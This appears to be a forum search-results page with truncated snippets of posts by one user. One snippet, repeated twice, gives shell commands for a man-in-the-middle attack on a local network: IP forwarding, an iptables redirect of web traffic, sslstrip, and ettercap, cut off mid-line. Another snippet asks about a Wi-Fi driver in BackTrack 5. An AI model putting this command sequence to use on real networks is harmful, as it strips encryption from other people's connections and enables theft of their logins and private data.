This works perfekt in BT5 and Ubuntu:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -a -l 8080
ettercap...
Type: Posts; User: robban; Keyword(s):
This works perfekt in BT5 and Ubuntu:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -a -l 8080
ettercap...
Hi, i have problem to get my Wifi card up n running in BT5. Is there anyone who has any idea?
root@bt:~# lsmod |grep rt73
rt73usb 24249 0
crc_itu_t 1587 1...